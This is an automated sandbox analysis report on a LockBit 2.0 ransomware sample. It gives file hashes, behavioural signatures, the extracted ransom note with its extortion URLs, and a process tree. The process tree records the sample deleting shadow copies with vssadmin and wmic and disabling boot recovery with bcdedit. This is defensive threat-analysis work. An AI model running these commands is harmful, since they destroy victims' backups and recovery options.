Analysis

  • max time kernel
    146s
  • max time network
    83s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    08/02/2023, 09:00

General

  • Target

    411b8cd39606bbe551627f1868bb4ace1f9fcb5387b6a58b9bb7f31c50109e10.exe

  • Size

    1.5MB

  • MD5

    fe5101b50e92a923d74cc6f0f4225539

  • SHA1

    f7a2fc4e471a203c8a5683c02ada2c3931c8f0ec

  • SHA256

    411b8cd39606bbe551627f1868bb4ace1f9fcb5387b6a58b9bb7f31c50109e10

  • SHA512

    bd1fa89a7a1f7b9f1bcb6ac574b9ad09d8cd053723b24f8d5fbe4a5946e6fce4325040364d1e9e79f98421bc8c656e4601ba4c96ff63b1472bbb01b59e0414ee

  • SSDEEP

    24576:EbRKGN66DdkfD2mtArFoZpAQbuSy6Pj44aOLu5S3+RIYMpS:+RK4ZWDVt4G2r67458tYMU

Malware Config

Extracted

Path

C:\program files\7-zip\Restore-My-Files.txt

Ransom Note
LockBit 2.0 Ransomware Your data are stolen and encrypted The data will be published on TOR website http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion and https://bigblog.at if you do not pay the ransom You can contact us and decrypt one file for free on these TOR sites http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion OR https://decoding.at Decryption ID: 8DF287EDD983EB1511B30AC9F07CAE0B
URLs

http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion

https://bigblog.at

http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion

http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion

https://decoding.at

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\411b8cd39606bbe551627f1868bb4ace1f9fcb5387b6a58b9bb7f31c50109e10.exe
    "C:\Users\Admin\AppData\Local\Temp\411b8cd39606bbe551627f1868bb4ace1f9fcb5387b6a58b9bb7f31c50109e10.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Users\Admin\AppData\Local\Temp\411b8cd39606bbe551627f1868bb4ace1f9fcb5387b6a58b9bb7f31c50109e10.exe
      ï®…
      2⤵
      • Modifies extensions of user files
      • Adds Run key to start application
      • Drops file in System32 directory
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Program Files directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:936
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2100
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:2152
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:752
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2108
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled no
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2120
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 936 -s 1712
        3⤵
        • Program crash
        PID:2568
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 480
      2⤵
      • Program crash
      PID:900
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2212
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:2400
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0xc8
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2664
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\Restore-My-Files.txt
      1⤵
        PID:236

      Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\Documents\Restore-My-Files.txt

              Filesize

              512B

              MD5

              652ce061d8c7011015003b458470dd94

              SHA1

              353640c65c9d98061d3b56076b41db2331b88ec6

              SHA256

              d89af9270fe1a128b0379b82286ee95a5dbfdc96c3850626c537a7e40bfa3b7a

              SHA512

              3c1f72d95424773024b1e7e574e03c507f3776c715721f335dd574092e3c1705a210619b2ce6f6efd66399808b319fb9b1b3fd555fea96b64781c4ed27bfcc56

            • \Users\Admin\AppData\Local\Temp\nsyFF57.tmp\System.dll

              Filesize

              12KB

              MD5

              cff85c549d536f651d4fb8387f1976f2

              SHA1

              d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e

              SHA256

              8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8

              SHA512

              531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

            • memory/936-63-0x0000000000400000-0x00000000004FB000-memory.dmp

              Filesize

              1004KB

            • memory/936-60-0x00000000004FA000-0x00000000004FB000-memory.dmp

              Filesize

              4KB

            • memory/936-58-0x00000000004FA000-0x00000000004FB000-memory.dmp

              Filesize

              4KB

            • memory/936-62-0x0000000000400000-0x00000000004FB000-memory.dmp

              Filesize

              1004KB

            • memory/936-56-0x0000000000401000-0x00000000004E1000-memory.dmp

              Filesize

              896KB

            • memory/2040-54-0x00000000753F1000-0x00000000753F3000-memory.dmp

              Filesize

              8KB

            • memory/2400-69-0x000007FEFB881000-0x000007FEFB883000-memory.dmp

              Filesize

              8KB